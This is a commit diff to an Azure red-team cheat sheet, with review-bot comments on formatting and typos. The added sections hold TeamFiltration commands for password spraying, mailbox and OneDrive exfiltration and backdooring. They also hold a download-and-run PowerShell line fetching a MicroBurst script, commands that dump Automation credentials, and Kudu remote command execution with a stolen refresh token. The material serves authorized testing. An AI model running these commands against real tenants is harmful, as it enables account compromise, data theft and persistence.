Azure - Pages v0.1
parent
bd1fe1e16b
commit
57e99121dc
|
@ -50,6 +50,7 @@ PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password"
|
|||
|
||||
## Federation
|
||||
|
||||
* [Golden SAML](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/)
|
||||
|
||||
|
||||
## AD Connect - Credentials
|
||||
|
|
|
@ -142,6 +142,21 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock
|
|||
|
||||
## Service Principals
|
||||
|
||||
```ps1
|
||||
PS C:\> Get-AzureADServicePrincipal
|
||||
|
||||
ObjectId AppId DisplayName
|
||||
-------- ----- -----------
|
||||
00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
|
||||
012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
|
||||
06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
|
||||
092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
|
||||
0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
|
||||
0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
|
||||
0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
|
||||
0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code>
|
||||
```
|
||||
|
||||
|
||||
## Other
|
||||
|
||||
|
|
|
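Review bot: the last row of the sample output in the new Service Principals block ends with a stray `</dev:code>` after "Microsoft Power BI Reporting and Analytics". It looks like markup copied along with the console output and should be dropped. The section also has no sentence saying what the listing is used for. Since the hunk header shows `Get-Mg...` cmdlets just above it in the same file, a line naming the module that provides `Get-AzureADServicePrincipal` would help readers.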
@ -44,6 +44,18 @@
|
|||
PS C:> Get-AzureInTuneScript
|
||||
PS C:> Show-AzureKeyVaultContent -All
|
||||
```
|
||||
* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
|
||||
```ps1
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
|
||||
```
|
||||
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
|
||||
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
|
||||
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
|
||||
|
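Review bot: path quoting is inconsistent across the added TeamFiltration lines. `--cookie-dump C:\\CookieData.txt` and `--tokens C:\\OutputTokens.txt` use doubled backslashes while every other path in the block uses single ones. Pick one form, and single is what a PowerShell or cmd prompt expects. The `--usernames` path also points at `C:\Clients\2021\...` while `--outpath` uses `C:\Clients\2023\...`, which reads like a leftover from an older example. A short comment per line saying what each mode does would make the block easier to scan.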
@ -112,6 +124,12 @@ The default lockout policy tolerates 10 failed attempts, then lock out an accoun
|
|||
```powershell
|
||||
o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
|
||||
```
|
||||
* [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration)
|
||||
```powershell
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
|
||||
```
|
||||
|
||||
## Azure Services Enumeration
|
||||
|
||||
|
|
|
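Review bot: the TeamFiltration bullet added here is a bare link, whereas the entry for the same tool added to the tools list in this commit carries a one-line description. Either repeat the description or link back to that entry. As in that block, the `--exclude` and `--passwords` paths use `C:\Clients\2021\...` next to an `--outpath` under `C:\Clients\2023\...`, so the sample paths should be made consistent.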
@ -15,6 +15,7 @@
|
|||
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
|
||||
```
|
||||
|
||||
|
||||
## Add Service Principal
|
||||
|
||||
* Generate a new service principal password/secret
|
||||
|
@ -32,6 +33,13 @@
|
|||
```
|
||||
|
||||
|
||||
## Add User to Group
|
||||
|
||||
```ps1
|
||||
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
||||
|
|
|
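Review bot: the new "Add User to Group" section is a single command with no prerequisites stated. `Add-AzureADGroupMember` belongs to the AzureAD module, while the context at the top of this file connects with `Connect-AzAccount`, so the section should say that a separate AzureAD session is needed and which role or ownership over the group the caller must hold. A sentence on why this sits on this page would also help, since the neighbouring "Add Service Principal" section explains its steps in bullets.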
@ -0,0 +1,53 @@
|
|||
# Azure Services - Container Registry
|
||||
|
||||
## Enumerate
|
||||
|
||||
List container registries in the subscription using Azure CLI
|
||||
|
||||
```ps1
|
||||
az login -u user@domain.onmicrosoft.com -p pass
|
||||
az acr list -o table
|
||||
```
|
||||
|
||||
Login to the Registry
|
||||
|
||||
```ps1
|
||||
acr=<ACRName> # from the previous command
|
||||
server=$(az acr login -n $acr --expose-token --query loginServer -o tsv)
|
||||
token=$(az acr login -n $acr --expose-token --query accessToken -o tsv)
|
||||
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
|
||||
```
|
||||
|
||||
List the images in the ACR
|
||||
|
||||
```ps1
|
||||
az acr repository list -n $acr
|
||||
```
|
||||
|
||||
List version tags for an image
|
||||
```ps1
|
||||
az acr repository show-tags -n $acr --repository mywebapp
|
||||
```
|
||||
|
||||
Connect to the container registry from a PowerShell console, set the $server and $token variables, and pull the image from the registry
|
||||
|
||||
```ps1
|
||||
# docker login ${registryURI} --username ${username} --password ${password}
|
||||
$token="<AccessToken>"
|
||||
$server="<LoginServer>"
|
||||
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
|
||||
docker pull $server/mywebapp:v1
|
||||
```
|
||||
|
||||
List docker containers inside a registry
|
||||
|
||||
```ps1
|
||||
IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
|
||||
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
|
||||
Get-AzACR -username ${username} -password ${password} -registry ${registryURI}
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [PENTESTING AZURE: RECON TECHNIQUES - April 29, 2022 Stefan Tita](https://securitycafe.ro/2022/04/29/pentesting-azure-recon-techniques/)
|
|
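Review bot: the "Login to the Registry" block is fenced as `ps1` but is written in POSIX shell (`acr=<ACRName>`, `server=$(az acr login ...)`), which will not run in the PowerShell console the later step refers to. Either retag it as a shell block or rewrite the assignments as `$acr = ...`. In the last block, `Set-ItemProperty ... -Name "DisableFirstRunCustomize" -Value 2` changes an HKLM registry value on the operator's machine with no explanation, and the `IEX ... downloadstring(...)` line pulls `Get-AzACR.ps1` from the `master` branch unpinned. Both deserve a comment, and the script URL should ideally be pinned to a commit. Both `docker login` lines pass the token with `-p`; `--password-stdin` keeps it out of process listings and shell history. "List version tags for an image" is also missing the blank line before its fence that the other steps have.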
@ -1,8 +1,16 @@
|
|||
# Azure Services - Runbook
|
||||
# Azure Services - Runbook and Automation
|
||||
|
||||
## Runbook
|
||||
|
||||
Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||
|
||||
## Create a Runbook
|
||||
### List the Runbooks
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount | Get-AzAutomationRunbook
|
||||
```
|
||||
|
||||
### Create a Runbook
|
||||
|
||||
* Check user right for automation
|
||||
```powershell
|
||||
|
@ -18,7 +26,27 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
|||
* Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
|
||||
|
||||
|
||||
## Persistence via Automation accounts
|
||||
## Automation Account
|
||||
|
||||
### List Automation Accounts
|
||||
|
||||
Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment.
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount
|
||||
```
|
||||
|
||||
### Get Automation Credentials
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount | Get-AzAutomationCredential
|
||||
Get-AzAutomationAccount | Get-AzAutomationConnection
|
||||
Get-AzAutomationAccount | Get-AzAutomationCertificate
|
||||
Get-AzAutomationAccount | Get-AzAutomationVariable
|
||||
```
|
||||
|
||||
|
||||
### Persistence via Automation Accounts
|
||||
|
||||
* Create a new Automation Account
|
||||
* "Create Azure Run As account": Yes
|
||||
|
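Review bot: the heading "Get Automation Credentials" covers four different asset types in the block under it (`Get-AzAutomationCredential`, `Get-AzAutomationConnection`, `Get-AzAutomationCertificate`, `Get-AzAutomationVariable`). Either rename it to something like "Get Automation Assets" or add a comment per line. The sentence "Azure Automation provides a way to automate the repetitive tasks..." describes the service as a whole and reads better directly under `## Automation Account` than under "List Automation Accounts".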
@ -39,6 +67,22 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
|||
```
|
||||
|
||||
|
||||
## Desired State Configuration
|
||||
|
||||
### List the DSC
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
|
||||
```
|
||||
|
||||
### Export the configuration
|
||||
|
||||
```ps1
|
||||
$DSCName = ${dscToExport}
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -march $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* []()
|
|
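Review bot: in the "Export the configuration" block, `where {$_.name -march $DSCName}` uses `-march`, which is not a PowerShell operator. This is presumably a typo for `-match` and the pipeline will fail as written. `$DSCName = ${dscToExport}` also assigns from a variable that is never set in the snippet; a placeholder such as `"<DSC-NAME>"` would match the style used elsewhere in the file. The added References section contains only an empty link, `* []()`, which should be filled in or removed before merge.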
@ -5,6 +5,7 @@
|
|||
* Data Tables - `*.table.core.windows.net`
|
||||
* Queues - `*.queue.core.windows.net`
|
||||
|
||||
|
||||
## Enumerate blobs
|
||||
|
||||
```powershell
|
||||
|
@ -13,6 +14,7 @@ PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
|||
Found Storage Account - redacted.blob.core.windows.net
|
||||
```
|
||||
|
||||
|
||||
## List and download blobs
|
||||
|
||||
```powershell
|
||||
|
@ -22,6 +24,13 @@ PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -Resou
|
|||
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
|
||||
```
|
||||
|
||||
Retrieve exposed containers with public access
|
||||
|
||||
```ps1
|
||||
PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}}
|
||||
```
|
||||
|
||||
|
||||
## SAS URL
|
||||
|
||||
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
||||
|
|
|
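Review bot: the caption says "Retrieve exposed containers with public access", but the added command has no filter. It prints `Uri` and `PublicAccess` for every container in every storage account, including private ones. Either add a `where` on the `PublicAccess` column or reword the caption to say it lists the access level of all containers. It is also worth noting that the command only sees storage accounts in the subscription currently selected in the Az context.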
@ -1,8 +1,29 @@
|
|||
# Azure Services - Web Apps
|
||||
|
||||
## List Web App
|
||||
|
||||
```ps1
|
||||
az webapp list
|
||||
```
|
||||
|
||||
## Execute Commands
|
||||
|
||||
```ps1
|
||||
$ARMToken = Get-ARMTokenWithRefreshToken `
|
||||
-RefreshToken "0.ARwA6WgJJ9X2qk..." `
|
||||
-TenantID "contoso.onmicrosoft.com"
|
||||
|
||||
Invoke-AzureRMWebAppShellCommand `
|
||||
-KuduURI "https://<webapp>.scm.azurewebsites.net/api/command" `
|
||||
-Token $ARMToken `
|
||||
-Command "whoami"
|
||||
```
|
||||
|
||||
## SSH Connection
|
||||
|
||||
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
|
||||
|
||||
|
||||
```powershell
|
||||
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
|
||||
```
|
||||
|
|
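Review bot: the URL in the SSH check, `https://${appName}?app.scm.azurewebsites.net/webssh/host`, has a `?` in the middle of the host name, so it cannot resolve as written. It also mixes `${appName}` with the `<webapp>` placeholder used in the Kudu URI a few lines earlier. Use one placeholder style and a host of the same `<webapp>.scm.azurewebsites.net` form. The "Execute Commands" block calls `Get-ARMTokenWithRefreshToken` and `Invoke-AzureRMWebAppShellCommand` without saying which module or script provides them; add the source, and state which status code from the check means SSH is enabled.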